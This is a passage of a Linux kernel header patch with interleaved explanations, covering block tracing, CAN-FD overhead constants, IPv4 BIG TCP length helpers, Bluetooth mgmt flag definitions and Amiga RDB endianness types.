+@@ -1305,7 +1305,7 @@ static inline bool bdev_is_zoned(struct block_device *bdev)
+ }
+ 
+ static inline bool bdev_op_is_zoned_write(struct block_device *bdev,
+-					  blk_opf_t op)
++					  enum req_op op)
+ {
+ 	if (!bdev_is_zoned(bdev))
+ 		return false;
+diff --git a/include/linux/blktrace_api.h b/include/linux/blktrace_api.h
+index cfbda114348c9..122c62e561fc7 100644
+--- a/include/linux/blktrace_api.h
++++ b/include/linux/blktrace_api.h
+@@ -85,10 +85,14 @@ extern int blk_trace_remove(struct request_queue *q);
+ # define blk_add_driver_data(rq, data, len)		do {} while (0)
+ # define blk_trace_setup(q, name, dev, bdev, arg)	(-ENOTTY)
+ # define blk_trace_startstop(q, start)			(-ENOTTY)
+-# define blk_trace_remove(q)				(-ENOTTY)
+ # define blk_add_trace_msg(q, fmt, ...)			do { } while (0)
+ # define blk_add_cgroup_trace_msg(q, cg, fmt, ...)	do { } while (0)
+ # define blk_trace_note_message_enabled(q)		(false)
++
++static inline int blk_trace_remove(struct request_queue *q)
++{
++	return -ENOTTY;
++}
+ #endif /* CONFIG_BLK_DEV_IO_TRACE */
+ 
+ #ifdef CONFIG_COMPAT
+diff --git a/include/linux/bootmem_info.h b/include/linux/bootmem_info.h
+index cc35d010fa949..e1a3c9c9754c5 100644
+--- a/include/linux/bootmem_info.h
++++ b/include/linux/bootmem_info.h
+@@ -3,6 +3,7 @@
+ #define __LINUX_BOOTMEM_INFO_H
+ 
+ #include <linux/mm.h>
++#include <linux/kmemleak.h>
+ 
+ /*
+  * Types for free bootmem stored in page->lru.next. These have to be in
+@@ -59,6 +60,7 @@ static inline void get_page_bootmem(unsigned long info, struct page *page,
+ 
+ static inline void free_bootmem_page(struct page *page)
+ {
++	kmemleak_free_part(page_to_virt(page), PAGE_SIZE);
+ 	free_reserved_page(page);
+ }
+ #endif
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index 942f9ac9fa7b6..8cef9ec3a89c2 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -933,7 +933,6 @@ struct bpf_trampoline {
+ 	int progs_cnt[BPF_TRAMP_MAX];
+ 	/* Executable image of trampoline */
+ 	struct bpf_tramp_image *cur_image;
+-	u64 selector;
+ 	struct module *mod;
+ };
+ 
+diff --git a/include/linux/can/length.h b/include/linux/can/length.h
+index 6995092b774ec..ef1fd32cef16b 100644
+--- a/include/linux/can/length.h
++++ b/include/linux/can/length.h
+@@ -69,17 +69,18 @@
+  * Error Status Indicator (ESI)		1
+  * Data length code (DLC)		4
+  * Data field				0...512
+- * Stuff Bit Count (SBC)		0...16: 4 20...64:5
++ * Stuff Bit Count (SBC)		4
+  * CRC					0...16: 17 20...64:21
+  * CRC delimiter (CD)			1
++ * Fixed Stuff bits (FSB)		0...16: 6 20...64:7
+  * ACK slot (AS)			1
+  * ACK delimiter (AD)			1
+  * End-of-frame (EOF)			7
+  * Inter frame spacing			3
+  *
+- * assuming CRC21, rounded up and ignoring bitstuffing
++ * assuming CRC21, rounded up and ignoring dynamic bitstuffing
+  */
+-#define CANFD_FRAME_OVERHEAD_SFF DIV_ROUND_UP(61, 8)
++#define CANFD_FRAME_OVERHEAD_SFF DIV_ROUND_UP(67, 8)
+ 
+ /*
+  * Size of a CAN-FD Extended Frame
+@@ -98,17 +99,18 @@
+  * Error Status Indicator (ESI)		1
+  * Data length code (DLC)		4
+  * Data field				0...512
+- * Stuff Bit Count (SBC)		0...16: 4 20...64:5
++ * Stuff Bit Count (SBC)		4
+  * CRC					0...16: 17 20...64:21
+  * CRC delimiter (CD)			1
++ * Fixed Stuff bits (FSB)		0...16: 6 20...64:7
+  * ACK slot (AS)			1
+  * ACK delimiter (AD)			1
+  * End-of-frame (EOF)			7
+  * Inter frame spacing			3
+  *
+- * assuming CRC21, rounded up and ignoring bitstuffing
++ * assuming CRC21, rounded up and ignoring dynamic bitstuffing
+  */
+-#define CANFD_FRAME_OVERHEAD_EFF DIV_ROUND_UP(80, 8)
++#define CANFD_FRAME_OVERHEAD_EFF DIV_ROUND_UP(86, 8)
+ 
+ /*
+  * Maximum size of a Classical CAN frame
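
The corrected overhead constants can be checked by recounting the fixed
fields above: the dynamic Stuff Bit Count is always 4 bits, and the CRC
field carries fixed stuff bits of its own (6 for CRC17, 7 for CRC21) that
the old totals left out. Assuming CRC21 as the comments do, the arithmetic
works out as:

	SFF: 61 - 1 (SBC 5 -> 4) + 7 (fixed stuff bits) = 67 bits,
	     DIV_ROUND_UP(67, 8) = 9 bytes (previously 8)
	EFF: 80 - 1 + 7 = 86 bits,
	     DIV_ROUND_UP(86, 8) = 11 bytes (previously 10)
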
+diff --git a/include/linux/dsa/sja1105.h b/include/linux/dsa/sja1105.h
+index 159e43171cccf..c177322f793d6 100644
+--- a/include/linux/dsa/sja1105.h
++++ b/include/linux/dsa/sja1105.h
+@@ -48,13 +48,9 @@ struct sja1105_deferred_xmit_work {
+ 
+ /* Global tagger data */
+ struct sja1105_tagger_data {
+-	/* Tagger to switch */
+ 	void (*xmit_work_fn)(struct kthread_work *work);
+ 	void (*meta_tstamp_handler)(struct dsa_switch *ds, int port, u8 ts_id,
+ 				    enum sja1110_meta_tstamp dir, u64 tstamp);
+-	/* Switch to tagger */
+-	bool (*rxtstamp_get_state)(struct dsa_switch *ds);
+-	void (*rxtstamp_set_state)(struct dsa_switch *ds, bool on);
+ };
+ 
+ struct sja1105_skb_cb {
+diff --git a/include/linux/ieee80211.h b/include/linux/ieee80211.h
+index d3088666f3f44..870ae4cd82029 100644
+--- a/include/linux/ieee80211.h
++++ b/include/linux/ieee80211.h
+@@ -4573,17 +4573,13 @@ static inline u8 ieee80211_mle_common_size(const u8 *data)
+ 
+ 	switch (u16_get_bits(control, IEEE80211_ML_CONTROL_TYPE)) {
+ 	case IEEE80211_ML_CONTROL_TYPE_BASIC:
+-		common += sizeof(struct ieee80211_mle_basic_common_info);
+-		break;
+ 	case IEEE80211_ML_CONTROL_TYPE_PREQ:
+-		common += sizeof(struct ieee80211_mle_preq_common_info);
+-		break;
+-	case IEEE80211_ML_CONTROL_TYPE_RECONF:
+-		if (control & IEEE80211_MLC_RECONF_PRES_MLD_MAC_ADDR)
+-			common += ETH_ALEN;
+-		return common;
+ 	case IEEE80211_ML_CONTROL_TYPE_TDLS:
+-		common += sizeof(struct ieee80211_mle_tdls_common_info);
++	case IEEE80211_ML_CONTROL_TYPE_RECONF:
++		/*
++		 * The length is the first octet pointed to by mle->variable,
++		 * so there is no need to add anything.
++		 */
+ 		break;
+ 	case IEEE80211_ML_CONTROL_TYPE_PRIO_ACCESS:
+ 		if (control & IEEE80211_MLC_PRIO_ACCESS_PRES_AP_MLD_MAC_ADDR)
+diff --git a/include/linux/ip.h b/include/linux/ip.h
+index 3d9c6750af627..d11c25f5030a0 100644
+--- a/include/linux/ip.h
++++ b/include/linux/ip.h
+@@ -35,4 +35,25 @@ static inline unsigned int ip_transport_len(const struct sk_buff *skb)
+ {
+ 	return ntohs(ip_hdr(skb)->tot_len) - skb_network_header_len(skb);
+ }
++
++static inline unsigned int iph_totlen(const struct sk_buff *skb, const struct iphdr *iph)
++{
++	u32 len = ntohs(iph->tot_len);
++
++	return (len || !skb_is_gso(skb) || !skb_is_gso_tcp(skb)) ?
++	       len : skb->len - skb_network_offset(skb);
++}
++
++static inline unsigned int skb_ip_totlen(const struct sk_buff *skb)
++{
++	return iph_totlen(skb, ip_hdr(skb));
++}
++
++/* IPv4 datagram length is stored into 16bit field (tot_len) */
++#define IP_MAX_MTU	0xFFFFU
++
++static inline void iph_set_totlen(struct iphdr *iph, unsigned int len)
++{
++	iph->tot_len = len <= IP_MAX_MTU ? htons(len) : 0;
++}
+ #endif	/* _LINUX_IP_H */
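
These helpers exist because an IPv4 GSO ("BIG TCP") packet longer than
64KiB cannot represent its length in the 16-bit tot_len field: tot_len is
stored as 0 and the real length has to be recovered from the skb, which is
what iph_totlen() does. A sketch of the intended calling convention (the
function name is hypothetical):

	#include <linux/ip.h>
	#include <linux/skbuff.h>

	static unsigned int example_l4_len(const struct sk_buff *skb)
	{
		/* skb_ip_totlen() falls back to skb->len - network offset
		 * when tot_len reads 0 on a GSO TCP skb.
		 */
		return skb_ip_totlen(skb) - ip_hdr(skb)->ihl * 4;
	}
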
+diff --git a/include/linux/mmc/card.h b/include/linux/mmc/card.h
+index c726ea7812552..daa2f40d9ce65 100644
+--- a/include/linux/mmc/card.h
++++ b/include/linux/mmc/card.h
+@@ -294,6 +294,7 @@ struct mmc_card {
+ #define MMC_QUIRK_TRIM_BROKEN	(1<<12)		/* Skip trim */
+ #define MMC_QUIRK_BROKEN_HPI	(1<<13)		/* Disable broken HPI support */
+ #define MMC_QUIRK_BROKEN_SD_DISCARD	(1<<14)	/* Disable broken SD discard support */
++#define MMC_QUIRK_BROKEN_SD_CACHE	(1<<15)	/* Disable broken SD cache support */
+ 
+ 	bool			reenable_cmdq;	/* Re-enable Command Queue */
+ 
+diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
+index d5eb3ab8e38f2..5a04fbf724768 100644
+--- a/include/linux/netdevice.h
++++ b/include/linux/netdevice.h
+@@ -5028,6 +5028,15 @@ static inline bool netif_is_l3_slave(const struct net_device *dev)
+ 	return dev->priv_flags & IFF_L3MDEV_SLAVE;
+ }
+ 
++static inline int dev_sdif(const struct net_device *dev)
++{
++#ifdef CONFIG_NET_L3_MASTER_DEV
++	if (netif_is_l3_slave(dev))
++		return dev->ifindex;
++#endif
++	return 0;
++}
++
+ static inline bool netif_is_bridge_master(const struct net_device *dev)
+ {
+ 	return dev->priv_flags & IFF_EBRIDGE;
+diff --git a/include/linux/nmi.h b/include/linux/nmi.h
+index f700ff2df074e..0db377ff8f608 100644
+--- a/include/linux/nmi.h
++++ b/include/linux/nmi.h
+@@ -197,7 +197,7 @@ u64 hw_nmi_get_sample_period(int watchdog_thresh);
+ #endif
+ 
+ #if defined(CONFIG_HARDLOCKUP_CHECK_TIMESTAMP) && \
+-    defined(CONFIG_HARDLOCKUP_DETECTOR)
++    defined(CONFIG_HARDLOCKUP_DETECTOR_PERF)
+ void watchdog_update_hrtimer_threshold(u64 period);
+ #else
+ static inline void watchdog_update_hrtimer_threshold(u64 period) { }
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index d20695184e0b9..9f617ffdb863f 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1809,6 +1809,7 @@ static inline int pci_dev_present(const struct pci_device_id *ids)
+ #define pci_dev_put(dev)	do { } while (0)
+ 
+ static inline void pci_set_master(struct pci_dev *dev) { }
++static inline void pci_clear_master(struct pci_dev *dev) { }
+ static inline int pci_enable_device(struct pci_dev *dev) { return -EIO; }
+ static inline void pci_disable_device(struct pci_dev *dev) { }
+ static inline int pcim_enable_device(struct pci_dev *pdev) { return -EIO; }
+diff --git a/include/linux/pipe_fs_i.h b/include/linux/pipe_fs_i.h
+index 6cb65df3e3ba5..28b3c6a673975 100644
+--- a/include/linux/pipe_fs_i.h
++++ b/include/linux/pipe_fs_i.h
+@@ -241,18 +241,14 @@ void generic_pipe_buf_release(struct pipe_inode_info *, struct pipe_buffer *);
+ 
+ extern const struct pipe_buf_operations nosteal_pipe_buf_ops;
+ 
+-#ifdef CONFIG_WATCH_QUEUE
+ unsigned long account_pipe_buffers(struct user_struct *user,
+ 				   unsigned long old, unsigned long new);
+ bool too_many_pipe_buffers_soft(unsigned long user_bufs);
+ bool too_many_pipe_buffers_hard(unsigned long user_bufs);
+ bool pipe_is_unprivileged_user(void);
+-#endif
+ 
+ /* for F_SETPIPE_SZ and F_GETPIPE_SZ */
+-#ifdef CONFIG_WATCH_QUEUE
+ int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots);
+-#endif
+ long pipe_fcntl(struct file *, unsigned int, unsigned long arg);
+ struct pipe_inode_info *get_pipe_info(struct file *file, bool for_splice);
+ 
+diff --git a/include/linux/ramfs.h b/include/linux/ramfs.h
+index 917528d102c4e..d506dc63dd47c 100644
+--- a/include/linux/ramfs.h
++++ b/include/linux/ramfs.h
+@@ -7,6 +7,7 @@
+ struct inode *ramfs_get_inode(struct super_block *sb, const struct inode *dir,
+ 	 umode_t mode, dev_t dev);
+ extern int ramfs_init_fs_context(struct fs_context *fc);
++extern void ramfs_kill_sb(struct super_block *sb);
+ 
+ #ifdef CONFIG_MMU
+ static inline int
+diff --git a/include/linux/sh_intc.h b/include/linux/sh_intc.h
+index 37ad81058d6ae..27ae79191bdc3 100644
+--- a/include/linux/sh_intc.h
++++ b/include/linux/sh_intc.h
+@@ -13,9 +13,9 @@
+ /*
+  * Convert back and forth between INTEVT and IRQ values.
+  */
+-#ifdef CONFIG_CPU_HAS_INTEVT
+-#define evt2irq(evt)		(((evt) >> 5) - 16)
+-#define irq2evt(irq)		(((irq) + 16) << 5)
++#ifdef CONFIG_CPU_HAS_INTEVT	/* Avoid IRQ0 (invalid for platform devices) */
++#define evt2irq(evt)		((evt) >> 5)
++#define irq2evt(irq)		((irq) << 5)
+ #else
+ #define evt2irq(evt)		(evt)
+ #define irq2evt(irq)		(irq)
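
With the "- 16" offset dropped, the lowest interrupt vectors no longer
collapse onto IRQ 0, which platform devices treat as "no IRQ". Worked on a
representative vector:

	/* old mapping */  evt2irq(0x200) = (0x200 >> 5) - 16 = 0    /* invalid */
	/* new mapping */  evt2irq(0x200) = 0x200 >> 5        = 16
	                   irq2evt(16)    = 16 << 5           = 0x200 /* still the inverse */
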
+diff --git a/include/linux/watch_queue.h b/include/linux/watch_queue.h
+index fc6bba20273bd..45cd42f55d492 100644
+--- a/include/linux/watch_queue.h
++++ b/include/linux/watch_queue.h
+@@ -38,7 +38,7 @@ struct watch_filter {
+ struct watch_queue {
+ 	struct rcu_head		rcu;
+ 	struct watch_filter __rcu *filter;
+-	struct pipe_inode_info	*pipe;		/* The pipe we're using as a buffer */
++	struct pipe_inode_info	*pipe;		/* Pipe we use as a buffer, NULL if queue closed */
+ 	struct hlist_head	watches;	/* Contributory watches */
+ 	struct page		**notes;	/* Preallocated notifications */
+ 	unsigned long		*notes_bitmap;	/* Allocation bitmap for notes */
+@@ -46,7 +46,6 @@ struct watch_queue {
+ 	spinlock_t		lock;
+ 	unsigned int		nr_notes;	/* Number of notes */
+ 	unsigned int		nr_pages;	/* Number of pages in notes[] */
+-	bool			defunct;	/* T when queues closed */
+ };
+ 
+ /*
+diff --git a/include/net/bluetooth/mgmt.h b/include/net/bluetooth/mgmt.h
+index 743f6f59dff81..5e68b3dd44222 100644
+--- a/include/net/bluetooth/mgmt.h
++++ b/include/net/bluetooth/mgmt.h
+@@ -91,24 +91,26 @@ struct mgmt_rp_read_index_list {
+ #define MGMT_MAX_NAME_LENGTH		(HCI_MAX_NAME_LENGTH + 1)
+ #define MGMT_MAX_SHORT_NAME_LENGTH	(HCI_MAX_SHORT_NAME_LENGTH + 1)
+ 
+-#define MGMT_SETTING_POWERED		0x00000001
+-#define MGMT_SETTING_CONNECTABLE	0x00000002
+-#define MGMT_SETTING_FAST_CONNECTABLE	0x00000004
+-#define MGMT_SETTING_DISCOVERABLE	0x00000008
+-#define MGMT_SETTING_BONDABLE		0x00000010
+-#define MGMT_SETTING_LINK_SECURITY	0x00000020
+-#define MGMT_SETTING_SSP		0x00000040
+-#define MGMT_SETTING_BREDR		0x00000080
+-#define MGMT_SETTING_HS			0x00000100
+-#define MGMT_SETTING_LE			0x00000200
+-#define MGMT_SETTING_ADVERTISING	0x00000400
+-#define MGMT_SETTING_SECURE_CONN	0x00000800
+-#define MGMT_SETTING_DEBUG_KEYS		0x00001000
+-#define MGMT_SETTING_PRIVACY		0x00002000
+-#define MGMT_SETTING_CONFIGURATION	0x00004000
+-#define MGMT_SETTING_STATIC_ADDRESS	0x00008000
+-#define MGMT_SETTING_PHY_CONFIGURATION	0x00010000
+-#define MGMT_SETTING_WIDEBAND_SPEECH	0x00020000
++#define MGMT_SETTING_POWERED		BIT(0)
++#define MGMT_SETTING_CONNECTABLE	BIT(1)
++#define MGMT_SETTING_FAST_CONNECTABLE	BIT(2)
++#define MGMT_SETTING_DISCOVERABLE	BIT(3)
++#define MGMT_SETTING_BONDABLE		BIT(4)
++#define MGMT_SETTING_LINK_SECURITY	BIT(5)
++#define MGMT_SETTING_SSP		BIT(6)
++#define MGMT_SETTING_BREDR		BIT(7)
++#define MGMT_SETTING_HS			BIT(8)
++#define MGMT_SETTING_LE			BIT(9)
++#define MGMT_SETTING_ADVERTISING	BIT(10)
++#define MGMT_SETTING_SECURE_CONN	BIT(11)
++#define MGMT_SETTING_DEBUG_KEYS		BIT(12)
++#define MGMT_SETTING_PRIVACY		BIT(13)
++#define MGMT_SETTING_CONFIGURATION	BIT(14)
++#define MGMT_SETTING_STATIC_ADDRESS	BIT(15)
++#define MGMT_SETTING_PHY_CONFIGURATION	BIT(16)
++#define MGMT_SETTING_WIDEBAND_SPEECH	BIT(17)
++#define MGMT_SETTING_CIS_CENTRAL	BIT(18)
++#define MGMT_SETTING_CIS_PERIPHERAL	BIT(19)
+ 
+ #define MGMT_OP_READ_INFO		0x0004
+ #define MGMT_READ_INFO_SIZE		0
+@@ -633,21 +635,21 @@ struct mgmt_rp_get_phy_configuration {
+ } __packed;
+ #define MGMT_GET_PHY_CONFIGURATION_SIZE	0
+ 
+-#define MGMT_PHY_BR_1M_1SLOT	0x00000001
+-#define MGMT_PHY_BR_1M_3SLOT	0x00000002
+-#define MGMT_PHY_BR_1M_5SLOT	0x00000004
+-#define MGMT_PHY_EDR_2M_1SLOT	0x00000008
+-#define MGMT_PHY_EDR_2M_3SLOT	0x00000010
+-#define MGMT_PHY_EDR_2M_5SLOT	0x00000020
+-#define MGMT_PHY_EDR_3M_1SLOT	0x00000040
+-#define MGMT_PHY_EDR_3M_3SLOT	0x00000080
+-#define MGMT_PHY_EDR_3M_5SLOT	0x00000100
+-#define MGMT_PHY_LE_1M_TX		0x00000200
+-#define MGMT_PHY_LE_1M_RX		0x00000400
+-#define MGMT_PHY_LE_2M_TX		0x00000800
+-#define MGMT_PHY_LE_2M_RX		0x00001000
+-#define MGMT_PHY_LE_CODED_TX	0x00002000
+-#define MGMT_PHY_LE_CODED_RX	0x00004000
++#define MGMT_PHY_BR_1M_1SLOT		BIT(0)
++#define MGMT_PHY_BR_1M_3SLOT		BIT(1)
++#define MGMT_PHY_BR_1M_5SLOT		BIT(2)
++#define MGMT_PHY_EDR_2M_1SLOT		BIT(3)
++#define MGMT_PHY_EDR_2M_3SLOT		BIT(4)
++#define MGMT_PHY_EDR_2M_5SLOT		BIT(5)
++#define MGMT_PHY_EDR_3M_1SLOT		BIT(6)
++#define MGMT_PHY_EDR_3M_3SLOT		BIT(7)
++#define MGMT_PHY_EDR_3M_5SLOT		BIT(8)
++#define MGMT_PHY_LE_1M_TX		BIT(9)
++#define MGMT_PHY_LE_1M_RX		BIT(10)
++#define MGMT_PHY_LE_2M_TX		BIT(11)
++#define MGMT_PHY_LE_2M_RX		BIT(12)
++#define MGMT_PHY_LE_CODED_TX		BIT(13)
++#define MGMT_PHY_LE_CODED_RX		BIT(14)
+ 
+ #define MGMT_PHY_BREDR_MASK (MGMT_PHY_BR_1M_1SLOT | MGMT_PHY_BR_1M_3SLOT | \
+ 			     MGMT_PHY_BR_1M_5SLOT | MGMT_PHY_EDR_2M_1SLOT | \
+@@ -972,11 +974,12 @@ struct mgmt_ev_auth_failed {
+ 	__u8	status;
+ } __packed;
+ 
+-#define MGMT_DEV_FOUND_CONFIRM_NAME		0x01
+-#define MGMT_DEV_FOUND_LEGACY_PAIRING		0x02
+-#define MGMT_DEV_FOUND_NOT_CONNECTABLE		0x04
+-#define MGMT_DEV_FOUND_INITIATED_CONN		0x08
+-#define MGMT_DEV_FOUND_NAME_REQUEST_FAILED	0x10
++#define MGMT_DEV_FOUND_CONFIRM_NAME		BIT(0)
++#define MGMT_DEV_FOUND_LEGACY_PAIRING		BIT(1)
++#define MGMT_DEV_FOUND_NOT_CONNECTABLE		BIT(2)
++#define MGMT_DEV_FOUND_INITIATED_CONN		BIT(3)
++#define MGMT_DEV_FOUND_NAME_REQUEST_FAILED	BIT(4)
++#define MGMT_DEV_FOUND_SCAN_RSP			BIT(5)
+ 
+ #define MGMT_EV_DEVICE_FOUND		0x0012
+ struct mgmt_ev_device_found {
+diff --git a/include/net/regulatory.h b/include/net/regulatory.h
+index 896191f420d50..b2cb4a9eb04dc 100644
+--- a/include/net/regulatory.h
++++ b/include/net/regulatory.h
+@@ -140,17 +140,6 @@ struct regulatory_request {
+  *      otherwise initiating radiation is not allowed. This will enable the
+  *      relaxations enabled under the CFG80211_REG_RELAX_NO_IR configuration
+  *      option
+- * @REGULATORY_IGNORE_STALE_KICKOFF: the regulatory core will _not_ make sure
+- *	all interfaces on this wiphy reside on allowed channels. If this flag
+- *	is not set, upon a regdomain change, the interfaces are given a grace
+- *	period (currently 60 seconds) to disconnect or move to an allowed
+- *	channel. Interfaces on forbidden channels are forcibly disconnected.
+- *	Currently these types of interfaces are supported for enforcement:
+- *	NL80211_IFTYPE_ADHOC, NL80211_IFTYPE_STATION, NL80211_IFTYPE_AP,
+- *	NL80211_IFTYPE_AP_VLAN, NL80211_IFTYPE_MONITOR,
+- *	NL80211_IFTYPE_P2P_CLIENT, NL80211_IFTYPE_P2P_GO,
+- *	NL80211_IFTYPE_P2P_DEVICE. The flag will be set by default if a device
+- *	includes any modes unsupported for enforcement checking.
+  * @REGULATORY_WIPHY_SELF_MANAGED: for devices that employ wiphy-specific
+  *	regdom management. These devices will ignore all regdom changes not
+  *	originating from their own wiphy.
+@@ -177,7 +166,7 @@ enum ieee80211_regulatory_flags {
+ 	REGULATORY_COUNTRY_IE_FOLLOW_POWER	= BIT(3),
+ 	REGULATORY_COUNTRY_IE_IGNORE		= BIT(4),
+ 	REGULATORY_ENABLE_RELAX_NO_IR           = BIT(5),
+-	REGULATORY_IGNORE_STALE_KICKOFF         = BIT(6),
++	/* reuse bit 6 next time */
+ 	REGULATORY_WIPHY_SELF_MANAGED		= BIT(7),
+ };
+ 
+diff --git a/include/net/route.h b/include/net/route.h
+index 6e92dd5bcd613..fe00b0a2e4759 100644
+--- a/include/net/route.h
++++ b/include/net/route.h
+@@ -35,9 +35,6 @@
+ #include <linux/cache.h>
+ #include <linux/security.h>
+ 
+-/* IPv4 datagram length is stored into 16bit field (tot_len) */
+-#define IP_MAX_MTU	0xFFFFU
+-
+ #define RTO_ONLINK	0x01
+ 
+ #define RT_CONN_FLAGS(sk)   (RT_TOS(inet_sk(sk)->tos) | sock_flag(sk, SOCK_LOCALROUTE))
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 2f35b82a123f8..1bbdddcf61542 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2124,6 +2124,7 @@ static inline void sock_graft(struct sock *sk, struct socket *parent)
+ }
+ 
+ kuid_t sock_i_uid(struct sock *sk);
++unsigned long __sock_i_ino(struct sock *sk);
+ unsigned long sock_i_ino(struct sock *sk);
+ 
+ static inline kuid_t sock_net_uid(const struct net *net, const struct sock *sk)
+diff --git a/include/soc/mscc/ocelot.h b/include/soc/mscc/ocelot.h
+index 967ba30ea6363..195ca8f0b6f9d 100644
+--- a/include/soc/mscc/ocelot.h
++++ b/include/soc/mscc/ocelot.h
+@@ -902,6 +902,11 @@ enum macaccess_entry_type {
+ 	ENTRYTYPE_MACv6,
+ };
+ 
++enum ocelot_proto {
++	OCELOT_PROTO_PTP_L2 = BIT(0),
++	OCELOT_PROTO_PTP_L4 = BIT(1),
++};
++
+ #define OCELOT_QUIRK_PCS_PERFORMS_RATE_ADAPTATION	BIT(0)
+ #define OCELOT_QUIRK_QSGMII_PORTS_MUST_BE_UP		BIT(1)
+ 
+@@ -939,6 +944,8 @@ struct ocelot_port {
+ 	unsigned int			ptp_skbs_in_flight;
+ 	struct sk_buff_head		tx_skbs;
+ 
++	unsigned int			trap_proto;
++
+ 	u16				mrp_ring_id;
+ 
+ 	u8				ptp_cmd;
+@@ -1032,12 +1039,9 @@ struct ocelot {
+ 	u8				ptp:1;
+ 	struct ptp_clock		*ptp_clock;
+ 	struct ptp_clock_info		ptp_info;
+-	struct hwtstamp_config		hwtstamp_config;
+ 	unsigned int			ptp_skbs_in_flight;
+ 	/* Protects the 2-step TX timestamp ID logic */
+ 	spinlock_t			ts_id_lock;
+-	/* Protects the PTP interface state */
+-	struct mutex			ptp_lock;
+ 	/* Protects the PTP clock */
+ 	spinlock_t			ptp_clock_lock;
+ 	struct ptp_pin_desc		ptp_pins[OCELOT_PTP_PINS_NUM];
+diff --git a/include/trace/events/erofs.h b/include/trace/events/erofs.h
+index 4f4c44ea3a655..e095d36db9391 100644
+--- a/include/trace/events/erofs.h
++++ b/include/trace/events/erofs.h
+@@ -66,8 +66,8 @@ TRACE_EVENT(erofs_fill_inode,
+ 	TP_fast_assign(
+ 		__entry->dev		= inode->i_sb->s_dev;
+ 		__entry->nid		= EROFS_I(inode)->nid;
+-		__entry->blkaddr	= erofs_blknr(iloc(EROFS_I_SB(inode), __entry->nid));
+-		__entry->ofs		= erofs_blkoff(iloc(EROFS_I_SB(inode), __entry->nid));
++		__entry->blkaddr	= erofs_blknr(erofs_iloc(inode));
++		__entry->ofs		= erofs_blkoff(erofs_iloc(inode));
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), nid = %llu, blkaddr %u ofs %u",
+diff --git a/include/trace/events/net.h b/include/trace/events/net.h
+index da611a7aaf970..f667c76a3b022 100644
+--- a/include/trace/events/net.h
++++ b/include/trace/events/net.h
+@@ -51,7 +51,8 @@ TRACE_EVENT(net_dev_start_xmit,
+ 		__entry->network_offset = skb_network_offset(skb);
+ 		__entry->transport_offset_valid =
+ 			skb_transport_header_was_set(skb);
+-		__entry->transport_offset = skb_transport_offset(skb);
++		__entry->transport_offset = skb_transport_header_was_set(skb) ?
++			skb_transport_offset(skb) : 0;
+ 		__entry->tx_flags = skb_shinfo(skb)->tx_flags;
+ 		__entry->gso_size = skb_shinfo(skb)->gso_size;
+ 		__entry->gso_segs = skb_shinfo(skb)->gso_segs;
+diff --git a/include/trace/events/timer.h b/include/trace/events/timer.h
+index 3e8619c72f774..b4bc2828fa09f 100644
+--- a/include/trace/events/timer.h
++++ b/include/trace/events/timer.h
+@@ -158,7 +158,11 @@ DEFINE_EVENT(timer_class, timer_cancel,
+ 		{ HRTIMER_MODE_ABS_SOFT,	"ABS|SOFT"	},	\
+ 		{ HRTIMER_MODE_REL_SOFT,	"REL|SOFT"	},	\
+ 		{ HRTIMER_MODE_ABS_PINNED_SOFT,	"ABS|PINNED|SOFT" },	\
+-		{ HRTIMER_MODE_REL_PINNED_SOFT,	"REL|PINNED|SOFT" })
++		{ HRTIMER_MODE_REL_PINNED_SOFT,	"REL|PINNED|SOFT" },	\
++		{ HRTIMER_MODE_ABS_HARD,	"ABS|HARD" },		\
++		{ HRTIMER_MODE_REL_HARD,	"REL|HARD" },		\
++		{ HRTIMER_MODE_ABS_PINNED_HARD, "ABS|PINNED|HARD" },	\
++		{ HRTIMER_MODE_REL_PINNED_HARD,	"REL|PINNED|HARD" })
+ 
+ /**
+  * hrtimer_init - called when the hrtimer is initialized
+diff --git a/include/uapi/linux/affs_hardblocks.h b/include/uapi/linux/affs_hardblocks.h
+index 5e2fb8481252a..a5aff2eb5f708 100644
+--- a/include/uapi/linux/affs_hardblocks.h
++++ b/include/uapi/linux/affs_hardblocks.h
+@@ -7,42 +7,42 @@
+ /* Just the needed definitions for the RDB of an Amiga HD. */
+ 
+ struct RigidDiskBlock {
+-	__u32	rdb_ID;
++	__be32	rdb_ID;
+ 	__be32	rdb_SummedLongs;
+-	__s32	rdb_ChkSum;
+-	__u32	rdb_HostID;
++	__be32	rdb_ChkSum;
++	__be32	rdb_HostID;
+ 	__be32	rdb_BlockBytes;
+-	__u32	rdb_Flags;
+-	__u32	rdb_BadBlockList;
++	__be32	rdb_Flags;
++	__be32	rdb_BadBlockList;
+ 	__be32	rdb_PartitionList;
+-	__u32	rdb_FileSysHeaderList;
+-	__u32	rdb_DriveInit;
+-	__u32	rdb_Reserved1[6];
+-	__u32	rdb_Cylinders;
+-	__u32	rdb_Sectors;
+-	__u32	rdb_Heads;
+-	__u32	rdb_Interleave;
+-	__u32	rdb_Park;
+-	__u32	rdb_Reserved2[3];
+-	__u32	rdb_WritePreComp;
+-	__u32	rdb_ReducedWrite;
+-	__u32	rdb_StepRate;
+-	__u32	rdb_Reserved3[5];
+-	__u32	rdb_RDBBlocksLo;
+-	__u32	rdb_RDBBlocksHi;
+-	__u32	rdb_LoCylinder;
+-	__u32	rdb_HiCylinder;
+-	__u32	rdb_CylBlocks;
+-	__u32	rdb_AutoParkSeconds;
+-	__u32	rdb_HighRDSKBlock;
+-	__u32	rdb_Reserved4;
++	__be32	rdb_FileSysHeaderList;
++	__be32	rdb_DriveInit;
++	__be32	rdb_Reserved1[6];
++	__be32	rdb_Cylinders;
++	__be32	rdb_Sectors;
++	__be32	rdb_Heads;
++	__be32	rdb_Interleave;
++	__be32	rdb_Park;
++	__be32	rdb_Reserved2[3];
++	__be32	rdb_WritePreComp;
++	__be32	rdb_ReducedWrite;
++	__be32	rdb_StepRate;
++	__be32	rdb_Reserved3[5];
++	__be32	rdb_RDBBlocksLo;
++	__be32	rdb_RDBBlocksHi;
++	__be32	rdb_LoCylinder;
++	__be32	rdb_HiCylinder;
++	__be32	rdb_CylBlocks;
++	__be32	rdb_AutoParkSeconds;
++	__be32	rdb_HighRDSKBlock;
++	__be32	rdb_Reserved4;
+ 	char	rdb_DiskVendor[8];
+ 	char	rdb_DiskProduct[16];
